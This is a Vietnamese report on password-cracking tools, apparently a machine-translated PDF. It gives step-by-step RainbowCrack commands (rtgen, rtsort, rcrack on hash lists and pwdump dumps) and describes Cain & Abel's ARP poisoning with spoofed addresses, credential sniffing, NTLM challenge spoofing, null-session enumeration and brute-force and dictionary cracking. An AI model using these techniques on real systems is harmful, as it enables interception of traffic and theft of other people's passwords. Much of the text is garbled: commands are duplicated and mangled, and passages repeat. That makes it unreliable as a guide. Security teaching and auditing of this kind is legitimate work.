loweralpha-numeric 33554432 0 rtgen md5 loweralpha-numeric 33554432 0 rtgen md5 loweralpha-numeric 33554432 0 rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0 rtgen md5 loweralpha-số 1 7 0 3800 1 7 1 3800 33554432 0 rtgen md5 loweralpha-số 1 7 1 3800 1 7 2 3800 33554432 0 rtgen md5 loweralpha-số 1 7 2 3800 1 7 3 3800 33554432 0 rtgen md5 loweralpha-số 1 7 3 3800 1 7 4 3800 33554432 0 rtgen md5 loweralpha-số 1 7 4 3800 Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 32 33554432 0 rtgen md5 loweralpha-numeric 1 7 5 3800 33554432 0 rtgen md5 loweralpha-số 1 7 5 3800 33554432 0 Nếu table NTLM hoặc table LM là mong muốn, thay thế "md5" trong câu lệnh trên với "NTLM" hoặc "LM". Nếu bộ ký tự chữ-số là mong muốn, thay thế "loweralpha-số" trong câu lệnh trên với "alpha-số". Nếu LM table sẽ được tạo ra, nên CONFIRM bộ ký tự là chữ-số thay vì loweralpha-số. Các thuật toán lm không bao giờ sử dụng chữ thường là plaintext . Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 33 Để tạo ra bảng rainbow. Vào thư mục RainbowCrack, và thực hiện lệnh sau: rtgen md5 loweralpha-numeric 1 7 0 3800 33554432 0 rtgen md5 loweralpha-số 1 7 0 3800 33554432 0 Khi lệnh được hoàn tất, một file có tên "md5_loweralpha-số # 17_0_3800x33554432_0.rt" có kích thước 512 MB sẽ được đặt đúng chỗ. Tên file là tất cả các tham số dòng lệnh được kết nối, với phần mở rộng "rt". Chương trình rcrack cần mẩu thông tin này để biết các tham số của bảng cầu vồng.Vì vậy, đừng đổi tên file. Các table còn lại có thể được tạo ra với các lệnh: rtgen md5 loweralpha-numeric 1 7 1 3800 loweralpha-số 1 7 1 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 2 3800 loweralpha-số 1 7 2 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 3 3800 loweralpha-số 1 7 3 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 4 3800 loweralpha-số 1 7 4 3800 33554432 0 rtgen md5 loweralpha-numeric 1 7 5 3800 loweralpha-số 1 7 5 3800 33554432 0 33554432 0 rtgen md5 33554432 0 rtgen md5 33554432 0 rtgen md5 33554432 0 rtgen md5 33554432 0 rtgen md5 Cuối cùng, những file này được tạo ra: md5_loweralpha-numeric#1-7_0_3800x33554432_0.rt 7_0_3800x33554432_0.rt 512MB md5_loweralpha-numeric#1-7_1_3800x33554432_0.rt 7_1_3800x33554432_0.rt 512MB md5_loweralpha-numeric#1-7_2_3800x33554432_0.rt 512MB md5_loweralpha-số # 1512MB md5_loweralpha-số # 1512MB md5_loweralpha-số # 1- Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 34 7_2_3800x33554432_0.rt 512MB md5_loweralpha-numeric#1-7_3_3800x33554432_0.rt 7_3_3800x33554432_0.rt 512MB md5_loweralpha-numeric#1-7_4_3800x33554432_0.rt 7_4_3800x33554432_0.rt 512MB md5_loweralpha-numeric#1-7_5_3800x33554432_0.rt 7_5_3800x33554432_0.rt 512MB 512MB md5_loweralpha-số # 1512MB md5_loweralpha-số # 1512MB md5_loweralpha-số # 1- Lúc này tiến trình tạo rainbow table hoàn thành. Bước 2: Chương trình rtsort sử dụng để sắp xếp rainbow tables Những rainbow tables được tạo ra bởi rtgen cần một số xử lý cụ thể để làm cho bảng tra cứu dễ dàng hơn. Chương trình rtsort được sử dụng để sắp xếp các "điểm cuối" của tất cả rainbow chains trong một rainbow table. Sử dụng các lệnh sau đây: rtsort md5_loweralpha-numeric#1-7_0_3800x33554432_0.rt 7_0_3800x33554432_0.rt rtsort md5_loweralpha-numeric#1-7_1_3800x33554432_0.rt 7_1_3800x33554432_0.rt rtsort md5_loweralpha-numeric#1-7_2_3800x33554432_0.rt 7_2_3800x33554432_0.rt rtsort md5_loweralpha-numeric#1-7_3_3800x33554432_0.rt 7_3_3800x33554432_0.rt rtsort md5_loweralpha-numeric#1-7_4_3800x33554432_0.rt 7_4_3800x33554432_0.rt rtsort md5_loweralpha-numeric#1-7_5_3800x33554432_0.rt 7_5_3800x33554432_0.rt rtsort md5_loweralpha-số 1rtsort md5_loweralpha-số # 1rtsort md5_loweralpha-số # 1rtsort md5_loweralpha-số # 1rtsort md5_loweralpha-số # 1rtsort md5_loweralpha-số # 1- Mỗi lệnh ở trên mất khoảng 1 đến 2 phút để hoàn thành. Chương trình rtsort sẽ ghi nhận rainbow table đã được sắp xếp các tập tin gốc. Bây giờ tiến trình sắp xếp rainbow table hoàn thành. Bước 3: Sử dụng chương trình rcrack để tra cứu rainbow tables Chương trình rcrack được sử dụng để tra cứu các bảng cầu vồng. Nó chỉ chấp nhận các rainbow tables đã sắp xếp và đặt trong thư mục c: \ rt, để crack băm đơn dòng lệnh sẽ là: rcrack c:\rt\*.rt -h your_hash_comes_here rcrack c: \ rt \ *. rt-h your_hash_comes_here Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 35 Để crack nhiều băm, đặt tất cả băm trong một file văn bản với mỗi băm là một dòng. Và sau đó chỉ định tên file trong dòng lệnh rcrack: rcrack c:\rt\*.rt -l hash_list_file rcrack c: \ rt \ *. rt-l hash_list_file Nếu các bảng cầu vồng tạo ra dùng thuật toán LM , chương trình hỗ trợ đặc biệt rcrack đã cho nó với "-f" chuyển lệnh. Một bãi băm tập tin ở định dạng pwdump được yêu cầu làm đầu vào cho chương trình rcrack. Tệp tin sẽ trông như thế này: Administrator:500:1c3a2b6d939a1021aad3b435b51404ee:e24106942bf38b cf57a6a4b29016eff6::: Guest:501:a296c9e4267e9ba9aad3b435b51404ee:9d978dda95e5185bbeda 9b3ae00f84b4::: Các tập tin pwdump là đầu ra của pwdump2, pwdump3 hoặc các tiện ích khác. Nó chứa cả LM hash và NTLM hash . Để crack hashes LM trong file pwdump, sử dụng lệnh sau đây: rcrack c:\rt\*.rt -f pwdump_file rcrack c: \ rt \ *. rt-f pwdump_file Các thuật toán băm LM chuyển đổi tất cả chữ thường trong plaintext thành chữ hoa, kết quả là tất cả các plaintexts nứt qua băm LM không bao giờ có chữ thường, trong khi plaintext thực tế có thể chứa chữ thường. Chương trình rcrack sẽ cố gắng làm điều chỉnh trường hợp với NTLM hashes được lưu trữ trong cùng một tập tin và cho ra bản original plaintext . V.Thực hiện tiến trình RainbowCrack trong windows: Bước 1: Tải các băm Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 36 Bước 2: Xác định các bảng rainbow cần tìm kiếm Chọn menu "Search Rainbow Tables..." xác định các rainbow tables cá nhân để tìm kiếm: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 37 Chọn menu "Search Rainbow Tables In Directory..." để tìm kiếm tất cả rainbow tables trong một thư mục: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 38 Chọn menu "Search Rainbow Tables In Profile..." xác định một chuỗi rainbow tables để tiếp tục tìm kiếm: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 39 Bước 3: Chờ đợi kết quả Khi rainbow tables được xác định, bảng tra cứu sẽ bắt đầu. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 40 Như vậy, cuối cùng ta đã dò tìm được mật khẩu Windows với Rainbow Table. 1.Vài nét giới thiệu về Cain & Abel: Cain & Abel là một công cụ khôi phục mật khẩu cho hệ điều hành Microsoft. Nó cho phép dễ dàng phục hồi của một số loại mật khẩu bằng cách sniffing mạng, phá các mật khẩu được mã hóa bằng cách sử dụng Dictionary, Brute-Force và phân tích mật mã tấn công, ghi âm cuộc hội thoại VoIP, giải mã tranh giành mật khẩu, khôi phục các key mạng không dây, để lộ hộp mật khẩu, phát hiện ra các mật khẩu được lưu trữ và phân tích định tuyến các giao thức. Chương trình không khai thác các lỗ hổng phần mềm hoặc lỗi mà không thể được cố định với ít nỗ lực. Nó bao gồm một số khía cạnh bảo mật / điểm yếu nội tại của các tiêu chuẩn của giao thức, phương pháp thẩm định và cơ chế bộ nhớ đệm, mục đích chính của nó là sự phục hồi đơn giản của mật khẩu và các thông tin từ nhiều nguồn khác nhau, tuy nhiên nó cũng có một số điều "không tiêu chuẩn" tiện ích cho người sử dụng Microsoft Windows. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 41 Cain & Abel đã được phát triển với hy vọng rằng nó sẽ hữu ích cho các quản trị mạng, giáo viên, chuyên gia tư vấn bảo mật / các chuyên gia, nhân viên pháp y, các nhà cung cấp phần mềm bảo mật, kiểm tra thâm nhập chuyên nghiệp và mọi người khác rằng các kế hoạch để sử dụng nó vì lý do đạo đức. Các tác giả sẽ không giúp đỡ hay hỗ trợ bất kỳ hoạt động bất hợp pháp thực hiện với chương trình này. Được cảnh báo rằng có khả năng là bạn sẽ gây ra thiệt hại và / hoặc mất dữ liệu bằng cách sử dụng phần mềm này và rằng không có sự kiện được các tác giả phải chịu trách nhiệm bồi thường thiệt hại hoặc mất dữ liệu. 2. Cấu hìnhCain & Abel đòi hỏi cấu hình của một số thông số, tất cả mọi thứ có thể được đặt trong hộp thoại cấu hình chính. Sniffer Tab Tại đây bạn có thể thiết lập card mạng được sử dụng bởi sniffer Cain và các tính năng của APRHai hộp kiểm tra cuối cùng cho phép / vô hiệu hóa các chức năng này lúc khởi động của chương trình. Sniffer này tương thích với WinPcap điều khiển phiên bản 2.3 hoặc mới hơn và trong phiên bản này chỉ có bộ điều hợp Ethernet được hỗ trợ bởi chương trình.Nếu kích hoạt, tùy chọn "Không sử dụng chế độ Promiscuous" cho phép APRNgộ độc trên các mạng không dây nhưng xin lưu ý rằng trong tình huống này bạn không thể sử dụng tính năng giả mạo MAC dưới đây! Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 42 APR Tab Đây là nơi bạn có thể cấu hình APR(Arp Poison Routing). Cain sử dụng một chủ đề riêng biệt mà sẽ gửi gói ARP Poison để máy nạn nhân mỗi 30 giây theo mặc định. Điều này là cần thiết vì mục hiện tại trong cache ARP của máy từ xa có thể được xả ra ngoài trong trường hợp lưu lượng truy cập không có. Từ hộp thoại này bạn có thể đặt thời gian giữa các cơn bão ARP Poison: thiết lập tham số này vài giây sẽ gây ra rất nhiều lưu lượng mạng ARP trong khi thiết lập nó để trì hoãn lâu dài không thể sản xuất các hijacking giao thông mong muốn. Các tùy chọn xác định các địa chỉ giả mạo mà Cain viết vào Ethernet, ARP Poison tiêu đề của gói ARP và tái định tuyến các gói dữ liệu. Trong trường hợp này, các cuộc tấn công ARP Poison sẽ hoàn toàn vô danh, vì thực sự của kẻ tấn công MAC một địa chỉ IP được không bao giờđược gửi trên mạng. Nếu bạn muốn kích hoạt tùy chọn này bạn phải xem xét rằng: Ethernet giả mạo địa chỉ có thể được sử dụng chỉ khi máy trạm của kẻ tấn công được kết nối với một HUB hay một switch mạng mà không sử dụng các "Port Security" tính năng. Nếu "Port Security" được kích hoạt trên switch, các địa chỉ nguồn MAC chứa trong mỗi khung ethernet được kiểm tra với một danh sách các địa chỉ MAC được phép đặt trên switch. Nếu địa chỉ MAC giả mạo không có trong danh sách này, việc chuyển đổi sẽ vô hiệu hóa các cổng và bạn sẽ mất kết nối. Các địa chỉ IP giả mạo phải là một địa chỉ miễn phí của mạng con của bạn. Các giao thức ARP không định tuyến qua hoặc VLAN vì thế nếu bạn thiết lập một IP giả mạo đó là trong mạng của bạn máy chủ từ xa sẽ trả lời cho cổng mặc định của nó và bạn sẽ không thấy phản ứng của nó. Ngoài ra nếu bạn sử dụng giả mạo địa chỉ IP đã Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 43 được sử dụng trong mạng của bạn sẽ có một "địa chỉ IP xung đột" và tấn công sẽ được dễ dàng nhận thấy. Đây là một số ví dụ về các địa chỉ giả mạo hợp lệ: Real địa chỉ Subnet Mask Hợp lệ nhiều cho các địa chỉ IP giả mạo IP 192.168.0.1 255.255.255.0 Phải là một địa chỉ không được sử dụng trong phạm vi 192.168.0.2 - 192.168.0.254 10.0.0.1 255.255.0.0 Phải là một địa chỉ không được sử dụng trong khoảng 10.0.0.2 - 10.0.255.254 172.16.0.1 255.255.255.2 Phải là một địa chỉ không được sử dụng trong khoảng 40 172.16.0.2 - 172.16.0.14 200.200.200. 1 255.255.255.2 52 Phải là một địa chỉ không được sử dụng trong khoảng 200.200.200.2 - 200.200.200.3 Các địa chỉ IP giả mạo được tự động kiểm tra chương trình khi bạn nhấn "Apply", nếu địa chỉ đã được sử dụng trong mạng con người một hộp thông báo sẽ báo cáo vấn đề. Các địa chỉ MAC giả mạo không phải có mặt trong subnet của bạn. Sự hiện diện của hai giống địa chỉ MAC trên cùng một mạng LAN-2 lớp có thể gây ra các vấn đề hội tụ thiết bị chuyển mạch, vì lý do này tôi quyết định không cho phép bạn dễ dàng thiết lập các MAC giả mạo của sự lựa chọn của bạn từ hộp thoại cấu hình. Giá trị mặc định được thiết lập để 001122334455 là một địa chỉ không hợp lệ không được phép tồn tại trong mạng của bạn và cùng lúc có thể dễ dàng xác định để xử lý sự cố. QUAN TRỌNG! Bạn không thể có, trên cùng một mạng-2 lớp, hai hoặc nhiều máy sử dụng Cain giả mạo MAC của APRvà địa chỉ MAC giả mạo tương tự. Các địa chỉ MAC giả mạo có thể thay đổi thay đổi giá trị registry "SpoofMAC" tại địa điểm này: "HKEY_CURRENT_USER \ Software \ Cain \ Settings". Bộ lọc và Tab Ports Tại đây bạn có thể cho phép / vô hiệu hóa bộ lọc của Cain và ứng dụng giao thức sniffer TCP / UDP. Cain chỉ nắm bắt thông tin xác thực không phải là toàn bộ nội dung của từng gói tin, tuy nhiên bạn có thể sử dụng Telnet lọc để đổ, vào một tập tin, tất cả các mặt trong một phiên TCP dữ liệu, sửa đổi các cổng lọc tương đối. Cain có các bộ lọc nội bộ sniffer được thiết kế để tồn tại trong một thế giới không đáng tin cậy như là một hệ thống mạng bị tấn công ARP Poison; Cain sử dụng máy trạng thái khác nhau để trích xuất từ các gói tin mạng lưới thông tin cần thiết để khôi phục lại hình thức thô của một mật khẩu truyền. Một số giao thức xác thực sử dụng một cơ chế thách thức, đáp ứng vì vậy nó cần phải thu thập các thông số từ Server Client-> và Server-> Khách hàng giao thông, giao thông đánh chặn ở cả hai hướng luôn luôn có thể nếu Cấp mạng-2 của bạn được thực hiện bởi trung tâm chỉ hoặc nếu bạn kết nối với một cổng gương về chuyển đổi, nhưng trên các mạng chuyển mạch nói chung, nó có thể đạt được chỉ bằng cách sử dụng một số loại tấn Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 44 công kỹ thuật giao thông như tuyến Poison Arp (APR). Nếu APR được kích hoạt, các sniffer sẽ trích xuất đáp ứng thách thức xác thực chỉ khi bạn đạt đến một kết nối giữa các máy tính nạn nhân. Dưới tab này, bạn cũng có thể cho phép / vô hiệu hóa việc phân tích các giao thức định tuyến (HSRP, VRRP, EIGRP, OSPF, RIPv1, RIPv2) và tính năng APR-DNS hoạt động như một lời rewriter DNS. Tab HTTP Fields Tab này chứa danh sách các trường tên người dùng và mật khẩu để được sử dụng bởi các HTTP sniffer lọc. Cookies và HTML hình thức mà đi du lịch trong các gói tin HTTP được kiểm tra theo cách này: đối với từng trường tên người sử dụng tất cả các mật khẩu sẽ được kiểm tra và nếu hai tham số được tìm thấy, các thông tin sẽ được bắt và hiển thị trên màn hình. Cookie sử dụng các lĩnh vực "logonusername =" và "userpassword =" cho các mục đích xác thực, nếu bạn không bao gồm hai lĩnh vực trong danh sách trên các sniffer sẽ không trích xuất các thông tin tương đối. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 45 Điều này được sử dụng để cấu hình của Cain ICMP / UDP / TCP traceroute. Bạn có thể thiết lập để giải quyết tên máy chủ, phát hiện sử dụng ICMP Mask và cho phép / vô hiệu hóa khai thác thông tin WHOIS cho mỗi bước nhảy. Thách thức Spoofing Tab Tại đây bạn có thể thiết lập giá trị thách thức tùy chỉnh để viết lại thành các gói tin xác thực NTLM. Tính năng này có thể được kích hoạt một cách nhanh chóng từ thanh công cụ của Cain và phải được sử dụng với APRMột thách thức cố định cho phép nứt NTLM băm bắt trên mạng bằng trung bình của RainbowTables. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 46 3. Các phương thức xác thực Cisco Config Downloader/Uploader Tính năng này cho phép bạn tải về hoặc tải lên các tập tin cấu hình của thiết bị Cisco thông qua SNMP / TFTP. Nó hỗ trợ định tuyến và chuyển mạch có sử dụng OLD-CISCO-SYSTEM-MIB hoặc CISCO mới-CONFIG-COPY-MIB; để biết thêm thông tin về những MIBs xin tham khảo trang web của Cisco. Cách thức hoạt động 1) Cain yêu cầu các file cấu hình chuyển giao cho các thiết bị Cisco sử dụng giao thức SNMP. Yêu cầu các gói dữ liệu được xây dựng bằng cách sử dụng một số độc quyền của Cisco OIDs rằng các nhà cung cấp cung cấp cho các chức năng này, chúng cũng chứa các thông số khác như các loại giao thức, địa chỉ máy chủ IP và tên tập tin để hướng dẫn các thiết bị về nơi để gửi hoặc nhận tập tin cấu hình của nó. 2) Tại thời điểm này thiết bị sẽ bắt đầu việc chuyển file bằng cách sử dụng giao thức quy định tại các yêu cầu (thiết lập để phục vụ TFTP để đơn giản). 3) Cain sẽ mở ra một ổ cắm TFTP trong chế độ lắng nghe và xử lý việc chuyển file. Một máy chủ TFTP là không cần thiết, khi tải lên các chương trình gửi các tập tin cấu hình cho các thiết bị, khi tải về nó nhận được nó. Cách sử dụng Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 47 Để tải về một cấu hình từ một thiết bị báo chí "Chèn nút trên bàn phím hoặc nhấp vào biểu tượng với màu xanh + trên thanh công cụ, cung cấp địa chỉ IP của thiết bị cho phép SNMP và quyền Đọc / Viết chuỗi cộng đồng. Để tải lên một cấu hình sử dụng chức năng tương đối trong danh sách các cửa sổ pop up menu. Hạn chế Tính năng này sẽ không hoạt động nếu mạng hạn chế, như ACL hoặc các quy tắc tường lửa, các giao thức thích (SNMP / TFTP) được thiết lập. Việc chuyển tập tin TFTP được bắt đầu bằng những thiết bị tự động để NAT giữa bạn và thiết bị là một vấn đề nữa. Yêu cầu - CCDU hoạt động trên bộ định tuyến và chuyển mạch của Cisco hỗ trợ các OLDCISCO-SYSTEM-MIB hoặc CISCO mới-CONFIG-COPY-MIB. Tường lửa PIX không hỗ trợ những MIBs. - Bạn cũng cần quyền đọc / ghi chuỗi SNMP cộng đồng (ví dụ: "tư nhân"), các ReadChỉ có một là không đủ. MAC Scanner Máy quét địa chỉ MAC là một IP cho địa chỉ MAC giải quyết rất nhanh dựa trên ARP Yêu cầu / gói tin trả lời. Nó có như là đầu vào một dải địa chỉ IP trên mạng con hiện hành và giải quyết các địa chỉ MAC của những người liên quan đến IP. Máy quét này bao gồm một cơ sở dữ liệu Oui, cung cấp thông tin MAC của nhà cung cấp, tính năng này rất hữu ích để nhanh chóng xác định các thiết bị chuyển mạch, định tuyến, cân bằng tải và tường lửa có trong mạng LAN. Bởi vì việc sử dụng các gói ARP mà không thể vượt qua các bộ định tuyến hoặc VLAN, tính năng này có thể giải quyết địa chỉ MAC trong lĩnh vực phát thanh địa Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 48 phương chỉ. Các cơ sở dữ liệu Oui là một phiên bản chuẩn hóa của danh sách IEEE Oui có tại liên kết này: http://standards.ieee.org/regauth/oui/index.shtml. Một khi máy hoạt động được tìm thấy, bạn cũng có thể giải quyết tên máy chủ của họ với "Giải quyết Host Name" chức năng trong danh sách các cửa sổ pop up menu. Cách sử dụng Hộp thoại cấu hình của máy quét được kích hoạt cách nhấn vào "Insert" trên bàn phím hoặc nhấp vào biểu tượng với màu xanh + trên thanh công cụ, sau đó bạn phải chọn dãy địa chỉ IP để giải quyết. Network Enumerator Các điều tra viên mạng sử dụng Windows chức năng quản lý mạng bản địa (Net *) để khám phá những gì đang hiện diện trên mạng. Nó cho phép xác định nhanh chóng của Domain Controllers, SQL Server, máy in máy chủ, Remote Access DialTrong các máy chủ, máy chủ Novell, Apple tập tin máy chủ, Terminal Server và như vậy. Nó cũng có thể hiển thị khi có thể phiên bản của hệ điều hành của họ. Cây trái được sử dụng để duyệt qua các mạng lưới và để kết nối đến máy từ xa, một khi kết nối với một máy chủ mà bạn cũng có thể liệt kê tên người dùng, nhóm, dịch vụ và cổ phiếu hiện tại trên đó. Theo mặc định chương trình kết nối từ xa IPC $ bằng cách sử dụng cổ phiếu hiện tại địa phương đăng nhập vào người sử dụng và nếu không sử dụng phiên NULL (Chưa xác định phiên), tuy nhiên nó cũng có thể để xác định các thông tin được sử dụng để kết nối. Danh sách nhanh có thể được sử dụng để chèn các địa chỉ IP của máy chủ mà không nhìn thấy trình duyệt mạng. Khi liệt kê những người sử dụng, Cain cũng chiết xuất từ nhận dạng bảo mật của họ (SID) và có khả năng xác định tên của tài khoản quản trị ngay cả khi nó được đổi tên thành. Điều này được thực hiện bằng cách nhìn vào các tài khoản RID đó là phần cuối cùng của một SID. Các RID của tài khoản quản trị luôn luôn bằng 500. Windows NT và sau đó có một tính năng bảo mật mà có thể hạn chế khả năng cho người dùng đăng nhập vô danh (còn gọi là kết nối phiên NULL) vào danh sách tên tài khoản và tên chia sẻ liệt kê. Điều này được thực hiện thiết lập để 1 tham số "RestrictAnonymous" dưới khóa registry: HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA Nếu chương trình không thể liệt kê những người sử dụng, vì hạn chế này, nó sẽ bắt đầu tự động quét SID và sẽ tiến hành với một tách chúng bằng cách sử dụng cùng một phương pháp được sử dụng bởi công cụ sid2user cũng được biết đến bởi Evgenii B. Rudnyi. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 49 Cách sử dụng Enumerations được đưa ra duyệt cây bên trái vào tab Network. Để xác định các thông tin cho một kết nối mạng bạn có thể phải bấm vào các máy tính mục tiêu và sử dụng "Connect As" chức năng trong trình đơn bật lên. Remote Registry Các tính năng registry từ xa cho phép các thao tác của các thông số đăng ký từ mạng. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 50 Cách sử dụng Enumerations được tung ra trình duyệt cây bên trái trong tab Network. Để xác định các thông tin cho một kết nối mạng bạn có thể phải bấm vào các máy tính mục tiêu và sử dụng "Connect As" chức năng trong trình đơn bật lên. Remote Registry Các tính năng registry từ xa cho phép các thao tác của các thông số đăng ký từ mạng. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 51 Cách sử dụng Enumerations được tung ra trình duyệt cây bên trái trong tab Network. Để xác định các thông tin cho một kết nối mạng bạn có thể phải bấm vào các máy tính mục tiêu và sử dụng "Connect As" chức năng trong trình đơn bật lên. Password Crackers Mật khẩu Crackers của Cain hỗ trợ phổ biến nhất các thuật toán băm và một số phương pháp mã hóa dựa vào chúng: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 52 Mật khẩu Crackers có thể được tìm thấy trong chương trình theo cơ chế "Cracker" tab phụ. Cây bên trái cho phép bạn chọn danh sách mong muốn có chứa mật khẩu mã hóa hoặc băm để crack. Những lựa chọn này sau đó được nạp vào từ điển thoại Brute-Force / sử dụng chức năng tương đối trong danh sách các cửa sổ pop up menu. Brute-Force Password Cracker Một cuộc tấn công Brute-Force là phương pháp phá vỡ một thuật toán mã hóa (có nghĩa là, để giải mã một văn bản cụ thể mã hóa) bằng cách thử tất cả các phím có thể. Tính khả thi của bạo lực tấn công phụ thuộc vào độ dài khóa của thuật toán, và vào lượng điện tính toán có sẵn cho kẻ tấn công. Cain của Brute-Force Password Cracker xét nghiệm tất cả các kết hợp có thể có của các nhân vật trong một nhân vật được xác định trước hoặc tùy chỉnh thiết lập chống lại các mật khẩu mã hóa nạp trong hộp thoại brute-force. Cách thức hoạt động Hộp thoại này cung cấp khả năng để lựa chọn một tập hợp các bộ ký tự được xác định trước hoặc để nhập vào một tùy chỉnh một; các mật khẩu ban đầu cũng có thể được thay đổi để trở lại một cuộc tấn công trước đó. Các "chính Tỷ lệ" trường cho biết số phím rằng cuộc tấn công cố gắng mỗi thứ hai chống lại tất cả băm / mật khẩu mã hóa nạp. "Thời gian còn lại" cho biết thời gian còn lại để hoàn thành các Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 53 không gian chính và "mật khẩu hiện tại" hiện trường cho thấy chìa khóa thực tế thử nghiệm của chương trình. Cracker của danh sách đó bắt đầu tấn công được cập nhật khi bạn thoát khỏi hộp thoại, để phản ánh tất cả các mật khẩu được tìm thấy. Dictionary Password Cracker Một từ điển tấn công bao gồm các cố gắng "mỗi từ trong từ điển" như một chìa khóa có thể cho một mật khẩu mã hóa. Một từ điển các mật khẩu tiềm năng là chính xác hơn được gọi là danh sách từ một. Loại tấn công nói chung là hiệu quả hơn một cuộc tấn công brute-force, bởi vì người dùng thường chọn mật khẩu nghèo. Có hai phương pháp cải thiện sự thành công của một từ điển tấn công: phương pháp đầu tiên là sử dụng một lớn hơn từ điển, hay từ điển nhiều hơn (từ điển kỹ thuật và từ điển ngôn ngữ nước ngoài sẽ tăng cơ hội tổng thể phát hiện các mật khẩu chính xác); phương pháp thứ hai là thực hiện các thao tác chuỗi trên từ điển. Từ điển của Cain Password Cracker có thể được cấu hình để sử dụng một danh sách các từ điển các tập tin và nó cũng cung cấp khả năng áp dụng một số biến thể cho mỗi từ: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 54 Nó cũng nhớ từng vị trí tập tin từ điển đạt để tiếp tục các cuộc tấn công trước đó (nút Reset làm sạch vị trí bắt đầu của từ điển "). Cách sử dụng Thêm tất cả các từ điển các tập tin bằng cách sử dụng nút "Add". Biến thể cho mỗi từ có thể được kích hoạt / vô hiệu hóa cách nhấp vào hộp kiểm tra tương đối và các cuộc tấn công được bắt đầu bằng cách sử dụng nút "Start". Cracker của danh sách đó bắt đầu tấn công được cập nhật khi bạn thoát khỏi hộp thoại, để phản ánh tất cả các mật khẩu được tìm thấy. Cryptanalysis Tính năng này cho phép bẻ mật khẩu sử dụng 'nhanh hơn thời gian Cryptanalytic - nhớ thương mại off' phương pháp được giới thiệu bởi Philippe Oechslin. Kỹ thuật này nứt sử dụng một bộ bàn lớn tính trước các mật khẩu được mã hóa, được gọi là Rainbow Bàn, để cải thiện các phương pháp thương mại-off được biết đến ngày hôm nay và để tăng tốc độ phục hồi của mật khẩu văn bản rõ ràng. Xin lưu ý rằng phần lớn các giao thức mạng hiện đại đã sử dụng cơ chế thách thức, phản ứng như vậy, nói chung, cuộc tấn công này không thích hợp với các kiểu mật khẩu được lấy từ mạng, trái lại nó thực sự hiệu quả để crack băm thẳng thường được sử dụng để lưu trữ được mã hóa mật khẩu tại địa phương. Những hình ảnh dưới đây cho thấy sự hồi phục của một Cisco PIX Firewall "kích hoạt chế độ" mật khẩu bằng cách sử dụng các cuộc tấn công phân tích mật mã: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 55 Như bạn có thể xem các mật khẩu ở trên (c1sc0pw), mã hoá bằng các PIX bằng cách sử dụng các thuật toán MD5, đã được bẻ khóa chỉ trong 3,25 giây mà Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 56 thôi. Cách sử dụng Cain tấn công phân tích mật mã có thể được đưa ra, nếu có thể, bằng cách sử dụng danh sách pop của bánh lên menu như minh họa dưới đây: Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 57 Chương trình sẽ tải tất cả băm chọn, vào hộp thoại nứt, phù hợp với loại hình tấn công được lựa chọn. Khi sử dụng bảng RainbowCracks, bảng mã tùy chỉnh có thể được nạp từ RainbowCrack tương thích của một tập tin "charsets.txt" bởi có nghĩa là các nút thoại tương đối. Password Decoders Mật khẩu giải mã có thể được sử dụng để ngay lập tức giải mã các mật khẩu được mã hóa từ nhiều nguồn, ví dụ như Windows bảo vệ cửa hàng, Quản lý Credential, tiêu chuẩn Edit Boxes, LSA bí mật, mật khẩu từ SQL Enterprise Manager, Windows Mail, DialUp, cấu hình máy tính từ xa và Windows không dây cấu hình dịch vụ. Cain cũng bao gồm bộ giải mã cho các ứng dụng như Microsoft không VNC, cấu hình máy khách VPN Cisco ..... mọi thông tin được mã hóa có thể được phục hồi ngay lập tức được quản lý bởi các chương trình với các "giải mã" thích hợp. Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 58 Những tính năng này thường yêu cầu truy cập địa phương trên hệ thống đích, dù sao Cain cũng cung cấp khả năng trích xuất một số thông tin từ bên ngoài Windows các tập tin registry hive. Access Database Passwords Decoder Tính năng này cho thấy các mật khẩu được sử dụng để bảo vệ các tập tin cơ sở dữ liệu (MDB.) tạo ra với Microsoft Access 95/97/2000/XP Các mật khẩu chính được lưu trữ trong các tập tin cơ sở dữ liệu bằng cách sử dụng một mã hóa XOR đơn giản có thể được đảo ngược ngay lập tức. Cách sử dụng Mọi thứ đều tự động, bạn chỉ có lựa chọn cơ sở dữ liệu mật khẩu bảo vệ. Base64 Password Decoder Báo Cáo : 5 Tools Crack Password Phổ Biến Nhất Page 59 Tính năng này giải mã Base64 mã hóa để hình thành chuỗi byte của họ ban đầu. Base64 được sử dụng trong một số tiêu chuẩn giao thức Internet như HTTP, định dạng, IMAP .... để mã hóa dữ liệu tùy ý dưới dạng văn bản ASCII. Những hình ảnh dưới đây cho thấy việc giải mã của một mật khẩu Base64 bắt từ một gói tin xác thực HTTP cơ bản: Cách sử dụng Mật khẩu giải mã Base64 thoại có thể được kích hoạt từ menu chính theo "Công cụ" hoặc nhấn nút thanh công cụ tương đối. Đơn giản chỉ cần cắt và dán các chuỗi Base64 mã hóa vào hộp thoại, các bộ giải mã 